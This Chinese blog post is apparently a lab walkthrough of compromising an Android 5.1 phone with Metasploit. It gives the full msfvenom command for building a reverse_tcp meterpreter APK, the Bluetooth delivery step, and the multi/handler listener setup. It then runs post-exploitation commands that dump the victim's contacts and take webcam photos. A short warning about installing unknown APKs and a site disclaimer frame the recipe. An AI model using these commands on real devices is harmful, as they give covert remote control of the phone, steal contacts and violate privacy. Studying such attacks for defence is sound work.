安装包无法通过检测怎么安装(来路不明的安装包请勿安装)
本次渗透为靶机测试。切勿用于非法用途!
攻击者:192.168.1.3 termux metasploit
受害者:192.168.1.2 Android 5.1 - Linux 3.10.72 (aarch64)
使用模块:multi/handler
首先生成安卓木马
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=3800 -o s.apk
将其移动到/storage/emulated/0/360目录。并使用蓝牙发送给受害者者。
受害者安装即可。回到攻击者,启动msfconsole。首先选择模块
use exploit multi/handler
设置监听地址
set lhost 192.168.1.3
设置反弹端口
set lprot 3800
设置playload
set payload android/meterpreter/reverse_tcp
启动
run
成功。试试执行命令。系统信息。
sysinfo
试试下载通讯录
dump_contacts
成功保存为txt文件。后面因为长时间未操作自动断开了。
试试拍照
webcam_snap
成功保存在files目录下。还有很多危险功能我就不一一说明了。一些来路不明的apk切勿安装。
,
免责声明:本文仅代表文章作者的个人观点,与本站无关。其原创性、真实性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容文字的真实性、完整性和原创性本站不作任何保证或承诺,请读者仅作参考,并自行核实相关内容。文章投诉邮箱:anhduc.ph@yahoo.com